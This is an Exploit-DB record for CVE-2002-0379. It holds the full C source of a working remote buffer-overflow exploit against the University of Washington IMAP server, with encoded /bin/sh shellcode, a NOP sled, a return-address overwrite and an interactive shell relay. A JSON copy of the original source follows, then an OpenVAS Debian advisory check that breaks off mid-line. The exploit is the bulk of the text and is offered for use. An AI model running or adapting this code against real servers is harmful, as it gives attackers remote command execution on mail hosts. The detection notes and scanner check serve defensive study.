ID EDB-ID:21442
Type exploitdb
Reporter korty
Modified 2002-05-10T00:00:00
Description
Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1). CVE-2002-0379. Remote exploit for linux platform
source: http://www.securityfocus.com/bid/4713/info
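Wu-imapd (the University of Washington IMAP server, uw-imapd) is vulnerable to a buffer overflow. The overflow has been reported to occur when a valid, logged-in user requests partial mailbox attributes, so an attacker needs working mailbox credentials before the vulnerable request can be sent. Exploitation may result in the execution of arbitrary code with the privileges of the server process. An attacker may also be able to crash the server, resulting in a denial-of-service condition.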
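This only affects builds of imapd that include legacy RFC 1730 (IMAP4) support, which is disabled by default in imapd 2001.313 and imap-2001.315. A server with that support enabled lists IMAP4 alongside IMAP4REV1 in its CAPABILITY response, which is a quick way to check whether a given installation is exposed.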
/*
* http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
*
* uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
*
* Copyright (C) 2002 Christophe "korty" Bailleux <cb@t-online.fr>
* Copyright (C) 2002 Kostya Kortchinsky <kostya.kortchinsky@renater.fr>
*
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* Usage: ./wu-imap host user password shellcode_address alignment
*
* Demonstration values for Linux:
*
* (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0
* (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0
*
* THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
*
* The code is dirty...but we like dirty things :)
* And it works very well :)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
/*
 * Status codes shared by the helpers and main(), plus the "no special
 * behaviour" values handed to socket(), send() and recv().
 */
enum {
    GOOD_EXIT        = 0,   /* operation succeeded */
    ERROR_EXIT       = 1,   /* operation failed */
    DEFAULT_PROTOCOL = 0,   /* protocol argument of socket() */
    SEND_FLAGS       = 0,   /* flags argument of send() */
    RECV_FLAGS       = 0    /* flags argument of recv() */
};
/*
 * Payload embedded by main() at offset 512 of the BODY[] section argument.
 * Per the per-instruction annotations below it is 32-bit x86 code that uses
 * `int $0x80` (Linux system-call convention) twice: first with %al = 0xb
 * (execve on Linux/i386) on the trailing path string, then with %eax = 1
 * (exit).
 *
 * The jmp/call/popl sequence leaves the address of the 7 trailing data bytes
 * in %esi.  Five of those bytes are stored 0x50 lower than their real value
 * and the `addb $0x50` instructions restore them in place, so the literal
 * text "/bin/sh" never appears in the request that reaches the server.
 *
 * Detection note: a content signature keyed on the literal "/bin/sh" will not
 * match this payload.  The long run of 0x90 bytes that main() places around
 * it and the abnormal length of the BODY[] section are the steadier
 * indicators.
 */
char sc[]=
"\xeb\x38" /* jmp 0x38 */
"\x5e" /* popl %esi */
"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */
"\x89\xf0" /* movl %esi,%eax */
"\x83\xc0\x08" /* addl $0x8,%eax */
"\x89\x46\x08" /* movl %eax,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %al,0x7(%esi) - NUL-terminates the path string */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xc3\xff\xff\xff" /* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh", bytes 1,2,3,5,6 stored minus 0x50 */
/*
 * Write the NUL-terminated string `buffer` to socket `s` with one send() call.
 *
 * Returns GOOD_EXIT unless send() reports an error (negative return), in
 * which case ERROR_EXIT is returned.  A short write is not detected: any
 * non-negative byte count is treated as success.
 */
int imap_send(int s, char *buffer)
{
    size_t length = strlen(buffer);

    return (send(s, buffer, length, SEND_FLAGS) < 0) ? ERROR_EXIT : GOOD_EXIT;
}
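/*
 * Read a server reply from socket `s` into `buffer` (capacity `size` bytes).
 *
 * Reading continues until a carriage return (13) has been seen, the peer
 * closes the connection, recv() fails, or the buffer is full.
 *
 * The buffer is zeroed first and the final byte is never handed to recv(),
 * so the result is always NUL-terminated.  The previous version let recv()
 * fill all `size` bytes; a peer sending `size` or more bytes without a CR
 * then made strchr() here, and printf("%s") in the caller, read past the end
 * of the array.
 *
 * Returns GOOD_EXIT on success (including an orderly close by the peer) and
 * ERROR_EXIT when recv() fails or no usable buffer was supplied.
 */
int imap_receive(int s, char *buffer, int size)
{
    int char_recv = 0;
    int tot_recv = 0;

    if (buffer == NULL || size <= 0)
        return ERROR_EXIT;

    memset(buffer, 0, (size_t)size);

    do {
        /* Reserve the last byte so the terminator written above survives. */
        int room = size - 1 - tot_recv;

        if (room <= 0)
            break;

        char_recv = recv(s, &buffer[tot_recv], (size_t)room, RECV_FLAGS);
        if (char_recv > 0)
            tot_recv += char_recv;
    } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));

    return (char_recv < 0) ? ERROR_EXIT : GOOD_EXIT;
}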
/* Command line written to the peer before the relay loop starts. */
#define BANNER "pwd ; uname -a"

/*
 * Relay bytes between the local terminal and descriptor `fd` until either
 * side reaches end-of-file or a read fails.
 *
 * Returns 0 when a read returns end-of-file and -1 when a read fails.
 * The results of select() and write() are not checked.
 *
 * Detection note: the first bytes this client writes after the overflow
 * request are the literal BANNER text, sent in the clear on the IMAP
 * connection.
 */
int interact( int fd )
{
    char    relay[ 666 ];
    fd_set  ready;
    ssize_t got;

    /* sizeof(BANNER) counts the literal's NUL; on "BANNER\n" that length
       covers the text plus the newline and stops before the NUL. */
    write( fd, BANNER"\n", sizeof(BANNER) );

    for ( ;; ) {
        FD_ZERO( &ready );
        FD_SET( STDIN_FILENO, &ready );
        FD_SET( fd, &ready );
        select( fd + 1, &ready, NULL, NULL, NULL );

        /* Local input goes to the peer. */
        if ( FD_ISSET(STDIN_FILENO, &ready) ) {
            got = read( STDIN_FILENO, relay, sizeof(relay) );
            if ( got <= 0 )
                return( got < 0 ? -1 : 0 );
            write( fd, relay, got );
        }

        /* Peer output goes to the local terminal. */
        if ( FD_ISSET(fd, &ready) ) {
            got = read( fd, relay, sizeof(relay) );
            if ( got <= 0 )
                return( got < 0 ? -1 : 0 );
            write( STDOUT_FILENO, relay, got );
        }
    }
}
/*
 * Print the expected command line and one sample invocation on standard
 * output, then terminate the process with status 0.  Does not return.
 */
void usage(char *cmd)
{
    fprintf(stdout, "Usage: %s host user pass shellcode_addr align\n", cmd);
    fprintf(stdout, "Demo: %s localhost test test1234 0xbffffa40 0\n", cmd);
    exit(0);
}
/*
 * Command-line driver.
 *
 * argv: host, user, password, a hexadecimal address and an integer
 * alignment offset.  The program connects to the "imap2" TCP service on the
 * host, requires "IMAP4rev1 200" in the greeting and " IMAP4 " in the
 * CAPABILITY reply, logs in, selects Inbox, sends a single
 * "PARTIAL 1 BODY[...] 1 1" command whose section argument is the oversized
 * buffer built below, sends LOGOUT, and finally passes the socket to
 * interact().
 *
 * Returns exit_code.  Several early exits return GOOD_EXIT even though the
 * run did not complete (see the notes at the two strstr() checks).
 *
 * What the server side sees, in order: CAPABILITY, LOGIN, SELECT Inbox, then
 * a PARTIAL command whose BODY[] section is about 1.1 KB of mostly 0x90
 * bytes (with align 0 and an address free of zero bytes).  A legitimate
 * section specifier is a short token, so a section argument of that length
 * is a sound criterion for rejecting or alerting on the request.
 */
int main(int argc, char *argv[])
{
struct sockaddr_in server;
struct servent *sp;
struct hostent *hp;
int s, i , ret, align;
int blaw = 1024;
char *user, *passwd;
char imap_info[4096];
char imap_login[4096];
char imap_query[4096];
char buffer[2048];
int exit_code = GOOD_EXIT;
/* usage() calls exit(), so execution only continues with exactly 5 arguments. */
if (argc != 6) usage(argv[0]);
user = argv[2];
passwd = argv[3];
/* NOTE(review): the unsigned long from strtoul() is narrowed into an int and
   neither conversion below reports malformed input. */
ret = strtoul(argv[4], NULL, 16);
align = atoi(argv[5]);
/* NOTE(review): lookup failures only set exit_code; control then skips the
   connection block and still reaches interact(s) at the bottom with `s`
   never assigned. */
if ((hp = gethostbyname(argv[1])) == NULL)
exit_code = ERROR_EXIT;
if ((exit_code == GOOD_EXIT) && (sp = getservbyname("imap2", "tcp")) ==
NULL)
exit_code = ERROR_EXIT;
if (exit_code == GOOD_EXIT) {
if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)
return exit_code = ERROR_EXIT;
bzero((char *) &server, sizeof(server));
/* NOTE(review): copies hp->h_length bytes without comparing it to
   sizeof(server.sin_addr). */
bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);
server.sin_family = hp->h_addrtype;
/* s_port is already in network byte order, so no htons() here. */
server.sin_port = sp->s_port;
if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)
exit_code = ERROR_EXIT;
else {
/* Status text: "checking the banner" (French, accents lost in extraction). */
printf(" [1;34mV�rification de la banni�re : [0m\n");
/* NOTE(review): missing parentheses - `==` binds tighter than `=`, so
   exit_code receives the result of the comparison rather than the return
   value.  The outcome matches the parenthesised calls further down only
   because ERROR_EXIT is 1 and GOOD_EXIT is 0. */
if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
/* Greeting must identify an IMAP4rev1 2000/2001-series server.  On a
   mismatch ("IMAPd service not recognised") exit_code is still GOOD_EXIT,
   so the process reports success. */
if (strstr(imap_info, "IMAP4rev1 200") == NULL) {
printf(" [1;32mService IMAPd non reconnu ... [0m\n");
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_send(s, "x CAPABILITY\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
/* Status text: "checking the service options". */
printf(" [1;34mV�rification des options du service : [0m\n");
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
/* The space-delimited token " IMAP4 " (distinct from IMAP4REV1) is taken as
   the sign that legacy RFC 1730 support is enabled.  Without it the program
   prints "IMAPd service not vulnerable" and returns GOOD_EXIT. */
if (strstr(imap_info, " IMAP4 ") == NULL) {
printf(" [1;32mService IMAPd non vuln�rable ... [0m\n");
shutdown(s, 2);
close(s);
return exit_code;
}
/* Status text: "IMAPd service vulnerable". */
printf(" [1;31mService IMAPd vuln�rable ... [0m\n");
/* NOTE(review): unbounded sprintf() of two command-line strings into a
   4096-byte array; long arguments overflow imap_login. */
sprintf(imap_login, "x LOGIN %s %s\n", user, passwd);
if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
/* The LOGIN reply is printed but never inspected, so a rejected login is not
   detected here. */
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
if ((exit_code = imap_send(s, "x SELECT Inbox\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
printf("%s", imap_info);
/* Build the section argument: 0x90 fill, sc[] copied at offset 512, then the
   address from argv[4] repeated from offset blaw + align up to 1096. */
memset(buffer, 0x90, sizeof(buffer));
memcpy(buffer + 512, sc, strlen(sc));
/* NOTE(review): `align` is unvalidated, so blaw + align can index outside
   buffer[2048]; the int-pointer stores also assume suitable alignment. */
for (i = blaw + align ; i < 1096; i +=4)
*(unsigned int *)(&buffer[i]) = ret;
/* Zero word that terminates the string consumed by "%s" below; it is written
   at i + 1, so buffer[i] keeps its 0x90 fill byte. */
*(unsigned int *)(&buffer[i + 1]) = 0;
sprintf(imap_query, "x PARTIAL 1 BODY[%s] 1 1\n", buffer);
if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_send(s, "x LOGOUT\n")) == ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==
ERROR_EXIT) {
shutdown(s, 2);
close(s);
return exit_code;
}
}
}
/* Reached on every path that did not return above, including lookup and
   connect failures; the value stored in `i` is not used afterwards. */
i = interact( s );
return exit_code;
}
{"id": "EDB-ID:21442", "hash": "c9d5a64ffdbc15de2eab9fa44d7826a9", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability 1", "description": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1). CVE-2002-0379. Remote exploit for linux platform", "published": "2002-05-10T00:00:00", "modified": "2002-05-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/21442/", "reporter": "korty", "references": [], "cvelist": ["CVE-2002-0379"], "lastseen": "2016-02-02T16:28:51", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0379"]}, {"type": "openvas", "idList": ["OPENVAS:53739"]}, {"type": "osvdb", "idList": ["OSVDB:790"]}, {"type": "exploitdb", "idList": ["EDB-ID:21443"]}, {"type": "nessus", "idList": ["IMAP_BODY_OVERFLOW.NASL", "MANDRAKE_MDKSA-2002-034.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-215-1:31563"]}], "modified": "2016-02-02T16:28:51"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/21442/", "sourceData": "source: http://www.securityfocus.com/bid/4713/info\r\n\r\nWu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.\r\n\r\nThis only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. 
\r\n\r\n/*\r\n * http://www.freeweb.nu/mantra/05_2002/uw-imapd.html\r\n *\r\n * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4\r\n *\r\n * Copyright (C) 2002 Christophe \"korty\" Bailleux <cb@t-online.fr>\r\n * Copyright (C) 2002 Kostya Kortchinsky <kostya.kortchinsky@renater.fr>\r\n *\r\n * All Rights Reserved\r\n * The copyright notice above does not evidence any\r\n * actual or intended publication of such source code.\r\n *\r\n * Usage: ./wu-imap host user password shellcode_addressr alignement\r\n *\r\n * Demonstration values for Linux:\r\n *\r\n * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0\r\n * (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0\r\n *\r\n * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n *\r\n * The code is dirty...but we like dirty things :)\r\n * And it works very well :)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n\r\n#define GOOD_EXIT 0\r\n#define ERROR_EXIT 1\r\n\r\n#define DEFAULT_PROTOCOL 0\r\n#define SEND_FLAGS 0\r\n#define RECV_FLAGS 0\r\n\r\nchar sc[]=\r\n\"\\xeb\\x38\" /* jmp 0x38 */\r\n\"\\x5e\" /* popl %esi */\r\n\"\\x80\\x46\\x01\\x50\" /* addb $0x50,0x1(%esi) */\r\n\"\\x80\\x46\\x02\\x50\" /* addb $0x50,0x2(%esi) */\r\n\"\\x80\\x46\\x03\\x50\" /* addb $0x50,0x3(%esi) */\r\n\"\\x80\\x46\\x05\\x50\" /* addb $0x50,0x5(%esi) */\r\n\"\\x80\\x46\\x06\\x50\" /* addb $0x50,0x6(%esi) */\r\n\"\\x89\\xf0\" /* movl %esi,%eax */\r\n\"\\x83\\xc0\\x08\" /* addl $0x8,%eax */\r\n\"\\x89\\x46\\x08\" /* movl %eax,0x8(%esi) */\r\n\"\\x31\\xc0\" /* xorl %eax,%eax */\r\n\"\\x88\\x46\\x07\" /* movb %eax,0x7(%esi) */\r\n\"\\x89\\x46\\x0c\" /* movl %eax,0xc(%esi) */\r\n\"\\xb0\\x0b\" /* movb $0xb,%al */\r\n\"\\x89\\xf3\" /* movl %esi,%ebx */\r\n\"\\x8d\\x4e\\x08\" /* leal 0x8(%esi),%ecx 
*/\r\n\"\\x8d\\x56\\x0c\" /* leal 0xc(%esi),%edx */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\x31\\xdb\" /* xorl %ebx,%ebx */\r\n\"\\x89\\xd8\" /* movl %ebx,%eax */\r\n\"\\x40\" /* inc %eax */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\xe8\\xc3\\xff\\xff\\xff\" /* call -0x3d */\r\n\"\\x2f\\x12\\x19\\x1e\\x2f\\x23\\x18\"; /* .string \"/bin/sh\" */\r\n\r\nint imap_send(int s, char *buffer)\r\n{\r\n int result = GOOD_EXIT;\r\n\r\n if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\nint imap_receive(int s, char *buffer, int size)\r\n{\r\n int result = GOOD_EXIT;\r\n int char_recv;\r\n int tot_recv = 0;\r\n\r\n bzero(buffer, size);\r\n do {\r\n char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);\r\n if (char_recv > 0)\r\n tot_recv += char_recv;\r\n } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));\r\n\r\n if (char_recv < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\n#define BANNER \"pwd ; uname -a\"\r\n\r\nint interact( int fd )\r\n{\r\n fd_set fds;\r\n ssize_t ssize;\r\n char buffer[ 666 ];\r\n\r\n write( fd, BANNER\"\\n\", sizeof(BANNER) );\r\n while ( 12 != 42 ) {\r\n FD_ZERO( &fds );\r\n FD_SET( STDIN_FILENO, &fds );\r\n FD_SET( fd, &fds);\r\n select( fd + 1, &fds, NULL, NULL, NULL );\r\n\r\n if ( FD_ISSET(STDIN_FILENO, &fds) ) {\r\n ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( fd, buffer, ssize );\r\n\r\n }\r\n\r\n if ( FD_ISSET(fd, &fds) ) {\r\n ssize = read( fd, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( STDOUT_FILENO, buffer, ssize );\r\n\r\n }\r\n }\r\n return( -1 );\r\n }\r\n\r\n\r\nvoid usage(char *cmd)\r\n{\r\n printf(\"Usage: %s host user pass shellcode_addr align\\n\", cmd);\r\n printf(\"Demo: %s localhost test test1234 0xbffffa40 0\\n\", cmd);\r\n 
exit(0);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct sockaddr_in server;\r\n struct servent *sp;\r\n struct hostent *hp;\r\n int s, i , ret, align;\r\n int blaw = 1024;\r\n char *user, *passwd;\r\n\r\n char imap_info[4096];\r\n char imap_login[4096];\r\n char imap_query[4096];\r\n char buffer[2048];\r\n\r\n int exit_code = GOOD_EXIT;\r\n\r\n if (argc != 6) usage(argv[0]);\r\n\r\n user = argv[2];\r\n passwd = argv[3];\r\n ret = strtoul(argv[4], NULL, 16);\r\n align = atoi(argv[5]);\r\n\r\n if ((hp = gethostbyname(argv[1])) == NULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if ((exit_code == GOOD_EXIT) && (sp = getservbyname(\"imap2\", \"tcp\")) ==\r\nNULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if (exit_code == GOOD_EXIT) {\r\n if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)\r\n return exit_code = ERROR_EXIT;\r\n\r\n bzero((char *) &server, sizeof(server));\r\n bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);\r\n server.sin_family = hp->h_addrtype;\r\n server.sin_port = sp->s_port;\r\n if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)\r\n exit_code = ERROR_EXIT;\r\n else {\r\n printf(\" [1;34mV\ufffdrification de la banni\ufffdre : [0m\\n\");\r\n if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \"IMAP4rev1 200\") == NULL) {\r\n printf(\" [1;32mService IMAPd non reconnu ... 
[0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_send(s, \"x CAPABILITY\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;34mV\ufffdrification des options du service : [0m\\n\");\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \" IMAP4 \") == NULL) {\r\n printf(\" [1;32mService IMAPd non vuln\ufffdrable ... [0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;31mService IMAPd vuln\ufffdrable ... [0m\\n\");\r\n sprintf(imap_login, \"x LOGIN %s %s\\n\", user, passwd);\r\n if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n if ((exit_code = imap_send(s, \"x SELECT Inbox\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n memset(buffer, 0x90, sizeof(buffer));\r\n memcpy(buffer + 512, sc, strlen(sc));\r\n\r\n for (i = blaw + align ; i < 1096; i +=4)\r\n *(unsigned int *)(&buffer[i]) = ret;\r\n\r\n *(unsigned int *)(&buffer[i + 1]) = 0;\r\n\r\n sprintf(imap_query, \"x PARTIAL 1 BODY[%s] 1 1\\n\", buffer);\r\n if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n 
}\r\n\r\n if ((exit_code = imap_send(s, \"x LOGOUT\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n }\r\n }\r\n\r\n i = interact( s );\r\n\r\n return exit_code;\r\n}\r\n", "osvdbidlist": ["790"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-10T10:34:48", "bulletinFamily": "NVD", "description": "Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.", "modified": "2017-10-09T21:30:06", "published": "2002-06-25T00:00:00", "id": "CVE-2002-0379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0379", "title": "CVE-2002-0379", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cyrus-imapd\nannounced via advisory DSA 215-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53739", "id": "OPENVAS:53739", "title": "Debian Security Advisory DSA 215-1 (cyrus-imapd)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_215_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 215-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Timo Sirainen discovered a buffer overflow in the Cyrus IMAP server,\nwhich could be exploited by a remote attacker prior to logging in. A\nmalicious user could craft a request to run commands on the server under\nthe UID and GID of the cyrus server.\n\nFor the current stable distribution (woody) this problem has been\nfixed in version 1.5.19-9.1.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 1.5.19-2.2.\n\nFor the current unstable distribution (sid) this problem has been\nfixed in version 1.5.19-9.10. The cyrus21-imapd packages are not\nvulnerable\n\nWe recommend that you upgrade your cyrus-imapd package.\";\ntag_summary = \"The remote host is missing an update to cyrus-imapd\nannounced via advisory DSA 215-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20215-1\";\n\nif(description)\n{\n script_id(53739);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0379\");\n script_bugtraq_id(4713);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 215-1 (cyrus-imapd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cyrus-admin\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-common\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-dev\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cyrus-imapd\", ver:\"1.5.19-2.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = 